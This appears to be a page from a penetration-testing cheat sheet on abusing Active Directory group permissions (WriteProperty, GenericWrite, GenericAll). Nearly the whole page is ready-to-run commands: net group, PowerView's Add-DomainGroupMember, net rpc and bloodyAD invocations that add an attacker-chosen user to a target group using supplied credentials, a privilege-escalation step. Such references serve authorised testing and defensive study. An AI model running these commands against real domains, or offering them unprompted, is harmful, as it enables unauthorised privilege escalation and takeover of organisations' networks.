search
githubEdit

DACL Attacks on a group

hashtag
1) WriteProperty/AllExtendedRights/GenericWrite Self/Generic ALL

With one of these rights, we can add a new member to the group

net group TARGET_GROUP user1 /add

hashtag
PowerView

Add-DomainGroupMember -Identity 'TARGET_GROUP' -Members 'user1'

hashtag
Linux

net rpc group addmem GROUP user2 -U domain.local/user1%password -S DC_IP

hashtag
BloodyAD

bloodyAD --host "DC_IP" -d "domain.local" -u "user2" -p "Password@1" add groupMember "GROUP" "user2"

hashtag
Windows Net command

net group "GROUP" user2 /add /domain
PreviousGroup Policy Object (GPO)NextDACL Attacks on an Organizational Unit (OU)

Last updated